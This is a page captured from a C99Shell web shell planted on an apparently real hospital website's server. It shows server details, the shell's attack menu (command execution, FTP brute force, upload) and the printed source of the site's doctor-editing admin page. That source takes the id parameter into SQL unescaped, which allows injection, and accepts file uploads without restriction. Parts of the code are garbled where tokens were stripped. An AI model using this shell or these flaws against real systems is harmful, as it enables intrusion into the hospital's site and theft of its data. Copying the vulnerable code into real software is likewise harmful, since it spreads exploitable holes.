!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/home/katebhospital/public_html/admin/   drwxr-xr-x
Free 984.22 GB of 3519.75 GB (27.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_doctor.php (14.04 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php 
include('conn.php');

if(isset(
$_GET['id'])) {
    
$doc_id $_GET['id'];
    
$doc mysqli_query($con"SELECT * FROM doctor where id = $doc_id");
    
$roww mysqli_fetch_array($doc);

    if(isset(
$_POST['update'])){
        
$doc_id $_GET['id'];
        
$name mysqli_real_escape_string($con$_POST['name']);
        
$speciallity mysqli_real_escape_string($con,$_POST['speciallity']);
        
$address mysqli_real_escape_string($con,$_POST['address']);
        
$experience mysqli_real_escape_string($con,$_POST['experience']);
        
$biography mysqli_real_escape_string($con,$_POST['biography']);
        
$education mysqli_real_escape_string($con,$_POST['education']);
        
$education_fa mysqli_real_escape_string($con,$_POST['education_fa']);
        
$phone mysqli_real_escape_string($con,$_POST['phone']);
        
$email mysqli_real_escape_string($con,$_POST['email']);
        
$facebook mysqli_real_escape_string($con,$_POST['facebook']);
        
$whatsapp mysqli_real_escape_string($con,$_POST['whatsapp']);
        
$name_fa mysqli_real_escape_string($con$_POST['name_fa']);
        
$speciallity_fa mysqli_real_escape_string($con$_POST['speciallity_fa']);
        
$address_fa mysqli_real_escape_string($con$_POST['address_fa']);
        
$experience_fa mysqli_real_escape_string($con$_POST['experience_fa']);
        
$biography_fa mysqli_real_escape_string($con$_POST['biography_fa']);
        
$dob mysqli_real_escape_string($con$_POST['dob']);
        
$p_name mysqli_real_escape_string($con$_POST['p_name']);
        
$p_name_fa mysqli_real_escape_string($con$_POST['p_name_fa']);
        
$p_location mysqli_real_escape_string($con$_POST['p_location']);
        
$p_location_fa mysqli_real_escape_string($con$_POST['p_location_fa']);
        
$p_year mysqli_real_escape_string($con$_POST['p_year']);
        
$p_institution_fa mysqli_real_escape_string($con$_POST['p_institution_fa']);
        
$p_institution mysqli_real_escape_string($con$_POST['p_institution']);
        
$e_position mysqli_real_escape_string($con$_POST['e_position']);
        
$e_position_fa mysqli_real_escape_string($con$_POST['e_position_fa']);
        
$e_institution mysqli_real_escape_string($con$_POST['e_institution']);
        
$e_institution_fa mysqli_real_escape_string($con$_POST['e_institution_fa']);
        
$e_year mysqli_real_escape_string($con$_POST['e_year']);
        
$e_location mysqli_real_escape_string($con$_POST['e_location']);
        
$e_location_fa mysqli_real_escape_string($con$_POST['e_location_fa']);
        
        
$lis_img $roww["img"]; // Default to the existing image
        
        
if(isset($_FILES['lis_img']['name']) && !empty($_FILES['lis_img']['name'])){
            
// Generate a random filename for the new image
            
$lis_img rand().$_FILES['lis_img']['name'];
            
            
// Remove the old image if it exists
            
if(!empty($roww['img'])){
                
$old_image_path "images/doctors/" $roww['img'];
                if(
file_exists($old_image_path)){
                    
unlink($old_image_path); // Delete the old image
                
}
            }
            
            
// Upload the new image
            
$tempname $_FILES['lis_img']['tmp_name'];
            
$folder "images/doctors/".$lis_img;
            
move_uploaded_file($tempname$folder);
        }

        
// Update the image filename in the database
       
$update_query mysqli_query($con"UPDATE doctor SET name='$name',speciallity='$speciallity',phone='$phone',email = '$email',img = '$lis_img',facebook = '$facebook',whatsapp = '$whatsapp',address = '$address',experience = '$experience',education = '$education', name_fa = '$name_fa', speciallity_fa = '$speciallity_fa', address_fa = '$address_fa', experience_fa='$experience_fa', education_fa='$education_fa', dob='$dob', p_name='$p_name', p_name_fa='$p_name_fa',e_position='$e_position', e_position_fa='$e_position_fa' where id=".$doc_id."");


        if (
$update_query) {
            echo 
"<script>alert('Updated Successfully');</script>";
            echo 
"<script>window.location.href = 'add-doctor.php'</script>";
        } else {
            echo 
"<script>alert('Update Failed');</script>";
        }
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title><?php include('title.php'?></title>
    <link rel="shortcut icon" type="image/png" href="images/fav.png">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/themify-icons.css">
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/styles.css">
    <link rel="stylesheet" href="css/red.css" id="style_theme">
    <link rel="stylesheet" href="css/responsive.css">
    <link rel="stylesheet" href="charts/css/morris.css">
    <link rel="stylesheet" href="css/jquery-jvectormap.css">
    <link rel="stylesheet" href="datatable/dataTables.bootstrap4.min.css">
    <link rel="stylesheet" href="plugins/summernote/summernote-bs4.css">
    <script src="js/modernizr.min.js"></script>
</head>
<body>
<div class="wrapper">
        <?php include('sidebar.php'); ?>
        <div id="content">
            <?php include('topbar.php'); ?>
<div class="row no-margin-padding">
                <div class="col-md-6">
                <h3 class="block-title">Edit Doctor / تغیر اطلاعات داکتر</h3>
                </div>
                <div class="col-md-6">
                    <ol class="breadcrumb">                        
                        <li class="breadcrumb-item">
                            <a href="index.php">
                                <span class="ti-home"></span>
                            </a>
                        </li>
                        <li class="breadcrumb-item">Doctors</li>
                        <li class="breadcrumb-item active">Edit Doctor</li>
                    </ol>
                </div>
            </div>
<div class="container-fluid">
                <div class="row">
                    <div class="col-md-12">
                        <div class="widget-area-2 proclinic-box-shadow">    
                            <form method="post" enctype="multipart/form-data">
                                <div class="form-row">
                                <div class="form-group col-md-12">
                                        <label for="address" style="font-size: 25px;">Doctor Information:</label>
                                        <hr color="green">
                                    </div>    
                                    <div class="form-group col-md-6">
                                        <label for="Doctor-name">Doctor Name</label>
                                        <input type="text" name="name" value="<?php echo $roww['name']; ?>" class="form-control" placeholder="Doctor name" id="Doctor-name">
                                    </div><div class="form-group col-md-6">
                                        <label for="DoB">Date of Birth</label>
                                        <input type="text" name="dob" value="<?php echo $roww['dob']; ?>" class="form-control" placeholder="Date Of Birth" id="dob">
                                    </div>
                                    <div class="form-group col-md-6">
                                        <label for="specialization">Specialization</label>
                                        <input type="text" name="speciallity" value="<?php echo $roww['speciallity']; ?>" placeholder="Specialization" class="form-control" id="specialization">
                                    </div>
                                    
                                    <div class="form-group col-md-6">
                                        <label for="phone">Phone</label>
                                        <input type="text" name="phone" value="<?php echo $roww['phone']; ?>" placeholder="Phone" class="form-control" id="phone">
                                    </div>
                                    <div class="form-group col-md-6">
                                        <label for="phone">Whatsapp number</label>
                                        <input type="text" name="whatsapp" value="<?php echo $roww['whatsapp']; ?>" placeholder="Whatsapp" class="form-control" id="phone">
                                    </div>
                                    <div class="form-group col-md-6">
                                        <label for="email">Email</label>
                                        <input type="email" name="email" value="<?php echo $roww['email']; ?>"  placeholder="email" class="form-control" id="Email">
                                    </div>
                                    <div class="form-group col-md-6">
                                        <label for="facebook">Facebook</label>
                                        <input type="text" name="facebook" value="<?php echo $roww['facebook']; ?>" placeholder="Facebook" class="form-control" id="phone">
                                    </div>
                                    <div class="form-group col-md-6">
                                        <label for="education">Doctor Education</label>
                                        <textarea placeholder="Doctor Details" name="education" class="form-control textarea" id="about-doctor" rows="3" value=""> <?php echo $roww['education']; ?></textarea>
                                    </div>
                                    <div class="form-group col-md-6">
                                        <label for="address">Address</label>
                                        <textarea placeholder="Address" name="address" class="form-control" id="address" rows="3"><?php echo $roww['address']; ?></textarea>
                                    </div>
                                    <div class="form-group col-md-12">
                                        <label for="file">Doctor Image</label>
                                        <input type="file" name="lis_img" class="form-control" id="file">
                                    </div>
                                    <div class="form-group col-md-12" style="text-align: right;">
                                        <label for="address"  style="font-size: 25px;">:اطلاعات داکتر</label>
                                        <hr color="green">
                                    </div>    
                                    <div class="form-group col-md-6" dir="rtl" style="text-align: right;">
                                        <label for="name">اسم داکتر </label>
                                        <input type="text" value="<?php echo $roww['name_fa']; ?>" name="name_fa" class="form-control" placeholder="اسم داکتر" id="Doctor-name">
                                    </div>
                                    <div class="form-group col-md-6" dir="rtl" style="text-align: right;">
                                        <label for="speciallity">تخصص</label>
                                        <input type="text" value="<?php echo $roww['speciallity_fa']; ?>" name="speciallity_fa" placeholder="تخصص دوکتور" class="form-control" id="speciallity">
                                    </div>
                                    <div class="form-group col-md-6" dir="rtl" style="text-align: right;">
                                        <label for="experience">سابقه کاری (به سال)</label>
                                        <input type="text" value="<?php echo $roww['experience_fa']; ?>" name="experience_fa" placeholder="سابقه کاری دوکتور" class="form-control" id="experience">
                                    </div>
                                    <div class="form-group col-md-6" dir="rtl" style="text-align: right;">
                                        <label for="education">تحصیلات </label>
                                        <textarea placeholder="تحصیلات دوکتور " name="education_fa" class="form-control textarea" id="about-doctor" rows="3"><?php echo $roww['education_fa']; ?></textarea>
                                    </div>
                                    <div class="form-group col-md-6" dir="rtl" style="text-align: right;">
                                        <label for="address">آدرس</label>
                                        <textarea placeholder="آدرس دوکتور" name="address_fa" class="form-control" id="address" rows="3"><?php echo $roww['address_fa']; ?></textarea>
                                    </div>
                                    <br>
                                    <div class="form-group col-md-12">
                                        <label for="address" style="font-size: 25px;">Doctor Experience:</label>
                                        <hr color="green">
                                    </div>                            
                                    <div class="form-group col-md-6">
                                        <label for="experience">Experience (in years)</label>
                                        <input type="text" name="experience" value="<?php echo $roww['experience']; ?>"  placeholder="Experience" class="form-control" id="experience">
                                    </div>
                                    <div class="form-group col-md-6">
                                        <label for="">Doctor Experience Details</label>
                                        <textarea type="text" rows="3" name="e_position" class="form-control textarea"><?php echo $roww['e_position']; ?></textarea>
                                    </div>
                                    <div class="form-group col-md-12" style="text-align: right;">
                                        <label for="" style="font-size: 25px;">سابقه کاری داکتر</label>
                                        <hr color="green">
                                    </div>    
                                    <div class="form-group col-md-6" dir="rtl" style="text-align: right;">
                                        <label for="biography">سوابق کاری داکتر</label>
                                        <textarea name="e_position_fa" class="form-control textarea" rows="3"><?php echo $roww['e_position_fa']; ?></textarea>
                                    </div>
                                    <div class="form-group col-md-12">
                                        <label for="address" style="font-size: 25px;">Short Term Educations:</label>
                                        <hr color="green">
                                    </div>    
                                    <div class="form-group col-md-6">
                                        <label for="">Short Term Educations Details</label>
                                        <textarea type="text" rows="3" name="p_name" class="form-control textarea"><?php echo $roww['p_name']; ?></textarea>
                                    </div>
                                    <div class="form-group col-md-12" style="text-align: right;">
                                        <label for="" style="font-size: 25px;">آموزش های کوتاه مدت</label>
                                        <hr color="green">
                                    </div>    
                                    <div class="form-group col-md-6" dir="rtl" style="text-align: right;">
                                        <label for="">آموزش های کوتاه مدت</label>
                                        <textarea name="p_name_fa" class="form-control textarea" rows="3"><?php echo $roww['p_name_fa']; ?></textarea>
                                    </div>
                                    <div class="form-group col-md-10 mb-3">
                                        <button type="submit" name="update" class="btn btn-primary btn-lg">Update</button>
                                    </div>
                                </div>
                            </form>
                            <!-- Alerts-->
                        </div>
                    </div>
                </div>
            </div>
            </div>
            <a id="back-to-top" href="#" class="back-to-top">
        <span class="ti-angle-up"></span>
    </a>
    <!-- /Back to Top -->
    <!-- Jquery Library-->
    <script src="plugins/jquery/jquery.min.js"></script>
<script src="plugins/bootstrap/js/bootstrap.bundle.min.js"></script>
<script src="dist/js/adminlte.min.js"></script>
<script src="dist/js/demo.js"></script>
<script src="plugins/summernote/summernote-bs4.min.js"></script>
<script>
  $(function () {
    $('.textarea').summernote()
  })
</script>

    <!-- Popper Library-->
    <script src="js/popper.min.js"></script>
    <!-- Bootstrap Library-->
    <script src="js/bootstrap.min.js"></script>
    
    <!-- Datatable  -->
    <script src="datatable/jquery.dataTables.min.js"></script>
    <script src="datatable/dataTables.bootstrap4.min.js"></script>
    
    <!-- Custom Script-->
    <script src="js/custom.js"></script>
    </body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.004 ]--